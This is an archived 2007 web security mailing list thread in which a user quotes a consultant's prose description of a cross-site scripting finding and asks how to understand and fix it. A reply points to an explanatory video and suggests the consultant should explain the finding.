[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] Cross Site Scripting

From: Bill Pennington <bill@xxxxxxxxxxxxxxx>
Subject: Re: [WEB SECURITY] Cross Site Scripting
Date: Thu, 20 Sep 2007 08:45:07 -0700 (PDT)

Here is a decent (if slow) explanation of XSS

http://www.virtualforge.de/vmovie/xss_selling_platform_v1.0.php

I agree with Daniel though, whomever provided that finding should be able to explain it to you. Looks like a cut'n'paste scanner jockey to me.

---
Bill Pennington
VP Services
WhiteHat Security Inc.
http://www.whitehatsec.com

----- Original Message -----
From: "Mad Unix" <madunix@xxxxxxxxx>
To: websecurity@xxxxxxxxxxxxx
Sent: Thursday, September 20, 2007 12:53:11 AM (GMT-0800) America/Los_Angeles
Subject: [WEB SECURITY] Cross Site Scripting


Our security consulting compay he discoverd on our web server the following risk: 

Cross Site Scripting 
Risk: High 

Description of Vulnerability 

The Cross-Site Scripting attack is a privacy violation that allows an attacker to acquire a legitimate user's 
credentials and to impersonate that user when interacting with a specific website. 
The attack hinges on the fact that the web site contains a script that returns a user's input 
(usually a parameter value) in an HTML page, without first sanitizing the input. 
This allows an input consisting of JavaScript code to be executed by the browser when the script returns this input 
in the response page. As a result, it is possible to form links to the site where one of the parameters consists of malicious 
JavaScript code. This code will be executed (by a user's browser) in the site context, granting 
it access to cookies that the user has for the site, and other windows in the site through the user's browser. 



-------------- 
Can any one tell me more about this effect and how to observe and resolve this issue, since is be given as high risk. 
Thanks 


-- 
madunix 
madunix@xxxxxxxxx 

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

References:
- [WEB SECURITY] Cross Site Scripting
  - From: Mad Unix

Prev by Date: Re: [WEB SECURITY] Cross Site Scripting
Next by Date: RE: [WEB SECURITY] Cross Site Scripting
Previous by thread: Re: [WEB SECURITY] Cross Site Scripting
Next by thread: RE: [WEB SECURITY] Cross Site Scripting
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site